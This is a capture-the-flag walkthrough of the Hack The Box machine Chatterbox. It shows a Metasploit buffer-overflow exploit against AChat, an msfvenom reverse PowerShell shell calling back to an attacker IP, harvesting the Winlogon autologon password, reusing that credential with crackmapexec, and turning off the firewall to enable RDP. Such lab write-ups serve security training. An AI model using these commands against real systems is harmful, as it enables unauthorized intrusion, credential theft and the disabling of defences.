HTB Machine Chatterbox Penetration Test Notes

Published by misaka19008 on 2024-11-13



Target Information

IP address: 10.10.10.74


Information Gathering

ICMP check

PING 10.10.10.74 (10.10.10.74) 56(84) bytes of data.
64 bytes from 10.10.10.74: icmp_seq=1 ttl=127 time=109 ms
64 bytes from 10.10.10.74: icmp_seq=2 ttl=127 time=109 ms
64 bytes from 10.10.10.74: icmp_seq=4 ttl=127 time=110 ms

--- 10.10.10.74 ping statistics ---
4 packets transmitted, 3 received, 25% packet loss, time 3331ms
rtt min/avg/max/mdev = 108.901/109.207/109.810/0.425 ms

Connectivity between the attack box and the target is fine. The reply TTL of 127 (Windows' default initial TTL of 128, decremented once on the way back) is already a hint that the target runs Windows.

Firewall detection

# Nmap 7.94SVN scan initiated Wed Oct 16 16:59:42 2024 as: nmap -sF -p- --min-rate 4000 -oN ./fin_result.txt 10.10.10.74
Nmap scan report for 10.10.10.74
Host is up (0.11s latency).
All 65535 scanned ports on 10.10.10.74 are in ignored states.
Not shown: 65535 closed tcp ports (reset)

# Nmap done at Wed Oct 16 17:00:06 2024 -- 1 IP address (1 host up) scanned in 23.97 seconds

The FIN scan tells us nothing here: every port came back as closed (RST), including the ones the SYN scan below shows as open. Windows answers a FIN probe with RST regardless of port state, so on a Windows host a FIN scan cannot distinguish open from closed, let alone reveal whether a firewall is in front of the service.

Network Port Scan

TCP port scan results

# Nmap 7.94SVN scan initiated Wed Oct 16 17:03:41 2024 as: nmap -sS -sV -A -p- --min-rate 4000 -oN ./tcp_result.txt 10.10.10.74
Nmap scan report for 10.10.10.74
Host is up (0.11s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp  open  http         AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp  open  achat        AChat chat system
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=10/16%OT=135%CT=1%CU=37011%PV=Y%DS=2%DC=T%G=Y%TM=67
OS:0F81E8%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S
OS:%TS=7)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O
OS:5=M53CNW8ST11%O6=M53CST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6
OS:=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M53CNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%D
OS:F=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=
OS:%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%
OS:W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%
OS:DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h08m13s, deviation: 2h18m35s, median: 4h48m12s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Chatterbox
|   NetBIOS computer name: CHATTERBOX\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-10-16T09:53:46-04:00
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-10-16T13:53:47
|_  start_date: 2024-10-16T13:26:12

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   107.29 ms 10.10.14.1
2   106.87 ms 10.10.10.74

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 16 17:05:44 2024 -- 1 IP address (1 host up) scanned in 123.28 seconds

UDP port scan results (open port list)

# Nmap 7.94SVN scan initiated Wed Oct 16 17:12:03 2024 as: nmap -sU -p- --min-rate 4000 -oN ./udp_ports.txt 10.10.10.74
Warning: 10.10.10.74 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.74
Host is up (0.12s latency).
All 65535 scanned ports on 10.10.10.74 are in ignored states.
Not shown: 65364 open|filtered udp ports (no-response), 171 closed udp ports (port-unreach)

# Nmap done at Wed Oct 16 17:15:08 2024 -- 1 IP address (1 host up) scanned in 185.04 seconds

UDP port detail scan results

(none)

The UDP scan is inconclusive: 171 ports answered with ICMP port-unreachable and the remaining 65364 gave no response at all (open|filtered), so it neither confirms nor rules out a UDP listener. Keep that in mind, because AChat's chat protocol itself runs over UDP 9256. The SMB OS discovery output identifies the target as Windows 7 Professional SP1 (host CHATTERBOX, workgroup WORKGROUP).


Service Probing

AChat service (port 9255)

Opening port 9255 in a browser failed, so I went straight to searching for known AChat vulnerabilities:

This turns up a remote buffer overflow in AChat, CVE-2015-1578.


Penetration Testing

Exploiting the AChat buffer overflow

Start Metasploit and search for achat; a single exploit module (exploit/windows/misc/achat_bof) comes up:

Use that module directly. The payload has to be windows/shell/reverse_tcp_allports here: the module encodes the shellcode to survive AChat's Unicode conversion, which leaves little room, and with the default payload the shellcode could not be encoded. Note also that the module delivers the overflow to AChat's UDP listener on 9256, the port the UDP scan above could only report as open|filtered:

use 0
set payload windows/shell/reverse_tcp_allports
set RHOSTS 10.10.10.74
set LHOST 10.10.14.3
run

After run the exploit fires and a basic command shell comes back.

That shell is fragile, so to get a stable PowerShell reverse shell, generate a reverse-PowerShell executable locally. windows/powershell_reverse_tcp is stageless, so a plain listener on the attack box (for example nc -lvnp 443 on 10.10.14.3) is enough to catch it:

msfvenom -p windows/powershell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f exe -o reverse443.exe

Then, from the shell on the target, map an SMB share hosted on the attack box (10.10.14.3; the share password is redacted below), copy the binary to a location any user can write to, and execute it:

net use Z: \\10.10.14.3\pentest_notes\chatterbox ********* /user:megumin
copy Z:\reverse443.exe C:\Users\Public\reverse443.exe
C:\Users\Public\reverse443.exe

Reverse PowerShell shell obtained!


Privilege Escalation

Abusing autologon credentials

Once on the box, run WinPEAS for local enumeration. It reports that the user Alfred has autologon enabled, and the password comes with it: Windows keeps an autologon password in plaintext in the DefaultPassword value of the Winlogon registry key, which any local user can read:
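The same check WinPEAS performs, done by hand from the PowerShell reverse shell. This is an added example, not code from the original post or from WinPEAS; the registry path and value names are the standard Winlogon ones, and the only assumption is that the shell runs as an ordinary local user.

```powershell
# Added example (not from the original post): read the Winlogon autologon
# values by hand. These live under HKLM and are readable by any local user.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$props = Get-ItemProperty -Path $winlogon

# Missing values simply come back as $null, so this lists what is and is not set.
$names = 'AutoAdminLogon', 'DefaultDomainName', 'DefaultUserName', 'DefaultPassword', 'AutoLogonCount'
$result = foreach ($n in $names) {
    [pscustomobject]@{ Name = $n; Value = $props.$n }
}
$result | Format-Table -AutoSize

# Edge case worth knowing: when autologon was configured with the Sysinternals
# Autologon tool, the password is stored as the DefaultPassword LSA secret rather
# than in this registry value. LSA secrets need SYSTEM to read, so in that case a
# low-privileged shell sees AutoAdminLogon=1 but no DefaultPassword.
if ($props.AutoAdminLogon -eq '1' -and [string]::IsNullOrEmpty($props.DefaultPassword)) {
    Write-Output 'AutoAdminLogon is on but DefaultPassword is empty: the password is an LSA secret (needs SYSTEM).'
}
```

On this target the DefaultUserName/DefaultPassword pair is what WinPEAS surfaces; the LSA-secret branch is the variant you hit on boxes where the value is absent despite AutoAdminLogon being set.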

Try Alfred's password as the Administrator password over SMB. crackmapexec flags an administrative login with Pwn3d! and runs the command given to -x through cmd.exe:

crackmapexec smb 10.10.10.74 -u Administrator -p "Welcome1!" -x "whoami /all"

Privilege escalation succeeded! Next, change the **Administrator** password, disable the firewall and enable **RDP**. This is fine on a lab box, but it is invasive and noisy: on a real engagement a password change or a firewall disable needs explicit permission in the rules of engagement:

crackmapexec smb 10.10.10.74 -u Administrator -p "Welcome1!" -x "net user Administrator *********"
crackmapexec smb 10.10.10.74 -u Administrator -p "*********" -x "netsh advfirewall set allprofiles state off"
crackmapexec smb 10.10.10.74 -u Administrator -p "*********" -x "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1"
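A less destructive way to reach the same end state as the three commands above (RDP reachable), added here as an example and not part of the original post. It runs in an elevated shell on the target and leaves the firewall on, opening only the Remote Desktop rule group; the registry path and the netsh rule group name are the standard Windows ones.

```powershell
# Added example (not from the original post). Run as Administrator on the target.
# Goal: enable RDP without "netsh advfirewall set allprofiles state off".

$ts = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'

# 1. Allow Terminal Services connections. This is the registry flag that
#    "wmic RDTOGGLE ... call SetAllowTSConnections 1" clears.
Set-ItemProperty -Path $ts -Name fDenyTSConnections -Value 0 -Type DWord

# 2. Make sure the RDP service is actually running.
if ((Get-Service -Name TermService).Status -ne 'Running') {
    Start-Service -Name TermService
}

# 3. Open only the Remote Desktop rule group. netsh is used on purpose: the
#    NetSecurity cmdlets (Enable-NetFirewallRule) only ship with Windows 8 /
#    Server 2012 and later, so they are not available on this Windows 7 target.
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

# 4. Verify rather than assume: flag cleared, rule enabled, listener bound.
(Get-ItemProperty -Path $ts -Name fDenyTSConnections).fDenyTSConnections        # expect 0
netsh advfirewall firewall show rule name=all | Select-String -Pattern 'Remote Desktop' -Context 0,2
netstat -ano | Select-String -Pattern ':3389\s+.*LISTENING'
```

Do not turn on Network Level Authentication (the UserAuthentication value under WinStations\RDP-Tcp) if you intend to connect with rdesktop as below: rdesktop has no CredSSP support and the connection would be refused, whereas xfreerdp handles NLA fine.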

Then log in with rdesktop. Note that in rdesktop -p sets the password, not the port; the port, if you want to spell it out, goes after the host:

rdesktop -u Administrator 10.10.10.74:3389

Flag files


This concludes the penetration test of this machine.


Last updated 2024-11-13